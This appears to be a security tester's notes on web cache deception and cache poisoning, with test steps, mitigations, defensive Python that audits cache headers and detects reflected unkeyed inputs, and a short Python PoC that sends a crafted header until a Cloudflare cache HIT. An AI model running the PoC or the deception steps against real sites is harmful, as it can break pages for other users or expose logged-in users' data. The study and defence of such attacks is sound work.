Cache

Things to check:

  • Check Response Headers for Cache Information
  • Send a malformed header, then check whether the same HTTP status code still comes back when the header is set normally (if it does, the error response was cached)

Cache Deception Attack

Web servers and CDNs often decide whether to cache a response from the file extension in the URL rather than from the response itself.

Example: a request to https://www.example.com/account.php/nonexistent.css may be served by account.php (the trailing path is ignored) while the cache treats it as a static .css file.

How it works:

  1. Check that the server returns home.php when accessing https://www.example.com/home.php/nonexistent.css
  2. Have an authenticated user trigger that URL
  3. Have a non-authenticated user trigger that URL afterwards
  • Check whether the non-authenticated user sees the information cached from the authenticated user's response

Mitigations:

  • Edge Cache TTL settings
  • Return a 404 or 302 for such URLs instead of the page
  • Cache files by their Content-Type rather than by URL extension
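Added example (my own code, not from these notes): one helper for the "check response headers for cache information" item at the top of the page, and one that makes the cache decision from the response's Content-Type instead of the URL suffix, so /account.php/nonexistent.css answered with text/html is never stored. Function names, the content-type lists and the sample headers are constructed for the example.

```python
"""Added example (not from the original notes): audit a response's cache
headers and decide cacheability from the Content-Type instead of the URL
extension. Function names and the sample headers are constructed."""

import re
from typing import Dict, Optional

# Content types a shared cache may store as static assets.
CACHEABLE_TYPES = {
    "text/css", "text/javascript", "application/javascript",
    "image/png", "image/jpeg", "image/gif", "image/svg+xml",
    "font/woff", "font/woff2", "application/font-woff", "application/font-woff2",
}

# URL suffixes that make an extension-based cache assume "static asset".
STATIC_EXT = {"css", "js", "png", "jpg", "jpeg", "gif", "svg", "woff", "woff2", "ico"}


def _lower(headers: Dict[str, str]) -> Dict[str, str]:
    return {k.lower(): v for k, v in headers.items()}


def path_extension(path: str) -> Optional[str]:
    """Extension of the last path segment, ignoring any query string."""
    last = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return last.rsplit(".", 1)[1].lower() if "." in last else None


def looks_like_deception(path: str, content_type: str) -> bool:
    """True when the URL ends like a static asset but the body is not one,
    e.g. /home.php/nonexistent.css answered with text/html."""
    if path_extension(path) not in STATIC_EXT:
        return False
    main_type = content_type.split(";", 1)[0].strip().lower()
    return main_type not in CACHEABLE_TYPES


def cache_decision(path: str, resp_headers: Dict[str, str]) -> str:
    """'cache' or 'no-store': decided from the response, never from the path."""
    h = _lower(resp_headers)
    ctype = h.get("content-type", "").split(";", 1)[0].strip().lower()
    cc = h.get("cache-control", "").lower()
    if "no-store" in cc or "private" in cc:
        return "no-store"            # origin says this is per-user
    if "set-cookie" in h:
        return "no-store"            # session-bound response
    if looks_like_deception(path, ctype):
        return "no-store"            # path says asset, body says page
    return "cache" if ctype in CACHEABLE_TYPES else "no-store"


def audit_cache_headers(resp_headers: Dict[str, str]) -> Dict[str, object]:
    """Summarise what the response headers say about caching: whether it
    was served from a cache, the TTL, and which request headers it varies on."""
    h = _lower(resp_headers)
    cc = h.get("cache-control", "").lower()
    status = (h.get("cf-cache-status") or h.get("x-cache") or "").upper()
    age = h.get("age", "0")
    age = int(age) if age.isdigit() else 0
    # s-maxage wins for shared caches, otherwise max-age
    m = re.search(r"s-maxage=(\d+)", cc) or re.search(r"max-age=(\d+)", cc)
    return {
        "served_from_cache": status.startswith("HIT") or age > 0,
        "ttl": int(m.group(1)) if m else None,
        "vary": [v.strip() for v in h.get("vary", "").split(",") if v.strip()],
        "shared_cacheable": "no-store" not in cc and "private" not in cc
                            and ("public" in cc or m is not None),
    }


if __name__ == "__main__":
    # Constructed sample responses
    print(cache_decision("/account.php/nonexistent.css",
                         {"Content-Type": "text/html; charset=utf-8", "Cache-Control": "max-age=3600"}))
    print(cache_decision("/static/app.css",
                         {"Content-Type": "text/css", "Cache-Control": "public, max-age=3600"}))
    print(audit_cache_headers({"Cf-Cache-Status": "HIT", "Cache-Control": "public, max-age=14400",
                               "Age": "120", "Vary": "Accept-Encoding"}))
```

Run it against real captured headers by pasting them into audit_cache_headers; a served_from_cache result on a page that carries Set-Cookie or user data is the deception indicator to chase.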

Cache Poisoning

This type of attack must be chained with another one. Let's say a certain parameter, cookie, or header breaks the site. If that response can be cached, and the cached response is served to other IPs and users, you can purposely break the site for other people because they receive the cached response.

So if there is an XSS attack, you can get the response cached so that it is served to others.

PoC:

```python
import requests
import sys

max_tries = 5
url = sys.argv[1]
custom_header = "X-React-Router-Spa-Mode: aa"  # sys.argv[2]


def make_request(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0",
        "Accept": "application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Sec-Fetch-Dest": "font",
        "Sec-Fetch-Site": "same-origin",
        "Te": "trailers",
    }
    # Take the custom header and add it: split on the first colon only and
    # strip the surrounding whitespace so the value is sent cleanly
    name, value = custom_header.split(":", 1)
    headers[name.strip()] = value.strip()
    resp = requests.get(url, headers=headers)
    return resp


# Hit the endpoint until it is cached
for i in range(max_tries):
    resp = make_request(url)
    print(f"Response {resp.status_code}")
    # .get() so a response without the Cloudflare header does not raise KeyError
    if resp.headers.get("Cf-Cache-Status") == "HIT":
        print(f"Response has been cached after {i+1} requests.")
        print(f"Try: curl {url}")
        break
# Try hitting it with a different IP, browser, or curl to see if the cached response is given back to you
```
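Added example (my own code, not part of these notes) of the defensive side of the paragraph above: a toy shared cache that keys responses on the URL plus the headers named in Vary, an origin that echoes an unkeyed request header into the page, and the check a cache can run to refuse storing such a response. It shows both fixes side by side: the origin declaring the input in Vary, or the cache declining to store a response that reflects unkeyed input. The origins, the header name and the value injected.example are constructed for the example.

```python
"""Added example, not part of the original notes: a toy shared cache that
keys on URL plus the headers named in Vary, used to show why a response
that echoes an unkeyed request header must not be stored, plus the check
that flags such responses. The origins and header values are constructed."""

from typing import Callable, Dict, List, Tuple

Headers = Dict[str, str]
Response = Tuple[Headers, str]
Origin = Callable[[str, Headers], Response]


def _hget(headers: Headers, name: str) -> str:
    """Case-insensitive header lookup; '' when absent."""
    name = name.lower()
    return next((v for k, v in headers.items() if k.lower() == name), "")


def _vary_names(resp: Headers) -> List[str]:
    return sorted(v.strip().lower() for v in _hget(resp, "Vary").split(",") if v.strip())


def reflecting_origin(path: str, req: Headers) -> Response:
    """Constructed origin: builds a script URL from X-Forwarded-Host (an input
    the cache does not key on) and marks the page publicly cacheable."""
    host = _hget(req, "X-Forwarded-Host") or "www.example.com"
    body = f'<html><script src="https://{host}/app.js"></script></html>'
    return ({"Content-Type": "text/html", "Cache-Control": "public, max-age=3600"}, body)


def varying_origin(path: str, req: Headers) -> Response:
    """Same origin, but it declares the reflected header in Vary so the
    cache keys on it (one of the fixes)."""
    headers, body = reflecting_origin(path, req)
    return ({**headers, "Vary": "X-Forwarded-Host"}, body)


def reflected_unkeyed_inputs(req: Headers, resp: Headers, body: str) -> List[str]:
    """Request headers whose value is echoed in the body but not listed in
    Vary. Non-empty means storing this response would hand one client's
    input to everyone who shares the cache."""
    vary = set(_vary_names(resp))
    return [name for name, value in req.items()
            if name.lower() not in vary and len(value) >= 4 and value in body]


class SharedCache:
    """Toy shared cache. guard=True refuses to store responses that reflect
    unkeyed input (the other fix, for when the origin cannot be changed)."""

    def __init__(self, origin: Origin, guard: bool = False):
        self.origin = origin
        self.guard = guard
        # path -> [(secondary key built from Vary, response headers, body)]
        self.store: Dict[str, List[Tuple[Tuple[Tuple[str, str], ...], Headers, str]]] = {}

    def get(self, path: str, req: Headers) -> Tuple[str, str]:
        """Return (cache status, body), like a CDN's Cf-Cache-Status."""
        for key, _resp, body in self.store.get(path, []):
            if all(_hget(req, name) == value for name, value in key):
                return "HIT", body
        resp, body = self.origin(path, req)
        cacheable = "public" in _hget(resp, "Cache-Control")
        if self.guard and reflected_unkeyed_inputs(req, resp, body):
            cacheable = False
        if cacheable:
            key = tuple((n, _hget(req, n)) for n in _vary_names(resp))
            self.store.setdefault(path, []).append((key, resp, body))
        return "MISS", body


def cross_user_leak(cache: SharedCache, path: str = "/home") -> bool:
    """Client A sends a crafted X-Forwarded-Host, client B sends none.
    True if B is handed A's value out of the cache."""
    cache.get(path, {"X-Forwarded-Host": "injected.example"})  # constructed value
    status, body = cache.get(path, {})
    return status == "HIT" and "injected.example" in body


if __name__ == "__main__":
    for label, cache in [("naive", SharedCache(reflecting_origin)),
                         ("guarded", SharedCache(reflecting_origin, guard=True)),
                         ("vary", SharedCache(varying_origin))]:
        print(f"{label:8s} leaks to other users: {cross_user_leak(cache)}")
```

The naive cache returns True (client B gets client A's header value), while both the guarded cache and the Vary-declaring origin return False. reflected_unkeyed_inputs is the part worth lifting into a real edge: any request header that appears verbatim in a cacheable body and is not in the cache key is a poisoning vector.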

Side Channel Leaks

XS-Leaks Wiki